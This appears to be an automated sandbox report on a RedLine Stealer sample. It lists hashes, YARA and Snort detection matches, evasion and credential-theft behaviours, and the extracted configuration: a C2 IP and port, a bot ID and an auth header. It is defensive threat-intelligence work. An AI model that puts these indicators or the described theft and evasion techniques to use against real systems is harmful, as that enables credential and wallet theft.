Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Igv6ymbAA3.exe

Overview

General Information

Sample Name:Igv6ymbAA3.exe
Original Sample Name:18ecf495a7e8dc91de0f57f60c9896f8.exe
Analysis ID:876997
MD5:18ecf495a7e8dc91de0f57f60c9896f8
SHA1:10a613527dc3d67c40957b9ee2eb8e0a4dd79fcc
SHA256:f4e57d6160cc7f2ad503c3b1627cb5176ccc6e20490399b3700cdf7eeef8beec
Tags:32exetrojan
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • Igv6ymbAA3.exe (PID: 5896 cmdline: C:\Users\user\Desktop\Igv6ymbAA3.exe MD5: 18ECF495A7E8DC91DE0F57F60C9896F8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "51.210.170.199:23368", "Bot Id": "LogsDiller Cloud (Telegram: @logsdillabot)", "Authorization Header": "c2955ed3813a798683a185a82e949f88"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 B8 88 44 24 2B 88 44 24 2F B0 A6 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e462:$pat14: , CommandLine:
          • 0x14a52:$v2_1: ListOfProcesses
          • 0x13170:$v4_3: base64str
          • 0x1312f:$v4_4: stringKey
          • 0x1317a:$v4_5: BytesToStringConverted
          • 0x13165:$v4_6: FromBase64
          • 0x1470d:$v4_8: procName
          00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmpMAL_Malware_Imphash_Mar23_1Detects malware by known bad imphash or rich_pe_header_hashArnim Rupp
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.Igv6ymbAA3.exe.2450000.0.raw.unpackMAL_Malware_Imphash_Mar23_1Detects malware by known bad imphash or rich_pe_header_hashArnim Rupp
              0.3.Igv6ymbAA3.exe.2450000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.3.Igv6ymbAA3.exe.2450000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                • 0x700:$s3: 83 EC 38 53 B0 B8 88 44 24 2B 88 44 24 2F B0 A6 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                • 0x1e9d0:$s5: delete[]
                • 0x1de88:$s6: constructor or from DllMain.
                0.2.Igv6ymbAA3.exe.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.Igv6ymbAA3.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 B8 88 44 24 2B 88 44 24 2F B0 A6 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
                  Click to see the 30 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.351.210.170.19949701233682043233 05/28/23-10:33:05.871920
                  SID:2043233
                  Source Port:49701
                  Destination Port:23368
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.351.210.170.19949701233682043231 05/28/23-10:33:20.355629
                  SID:2043231
                  Source Port:49701
                  Destination Port:23368
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:51.210.170.199192.168.2.323368497012043234 05/28/23-10:33:06.698130
                  SID:2043234
                  Source Port:23368
                  Destination Port:49701
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "51.210.170.199:23368", "Bot Id": "LogsDiller Cloud (Telegram: @logsdillabot)", "Authorization Header": "c2955ed3813a798683a185a82e949f88"}
                  Multi AV Scanner detection for submitted file
                  Source: Igv6ymbAA3.exeVirustotal: Detection: 40%Perma Link
                  Machine Learning detection for sample
                  Source: Igv6ymbAA3.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeUnpacked PE file: 0.2.Igv6ymbAA3.exe.400000.0.unpack
                  Source: Igv6ymbAA3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: R"C:\putomeru\rivigonahehu\nafuzul.pdb source: Igv6ymbAA3.exe
                  Source: Binary string: _.pdb source: Igv6ymbAA3.exe, 00000000.00000002.401980636.0000000002657000.00000004.00000020.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\putomeru\rivigonahehu\nafuzul.pdb source: Igv6ymbAA3.exe

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49701 -> 51.210.170.199:23368
                  Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49701 -> 51.210.170.199:23368
                  Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 51.210.170.199:23368 -> 192.168.2.3:49701
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 51.210.170.199:23368
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: Joe Sandbox ViewIP Address: 51.210.170.199 51.210.170.199
                  Source: global trafficTCP traffic: 192.168.2.3:49701 -> 51.210.170.199:23368
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
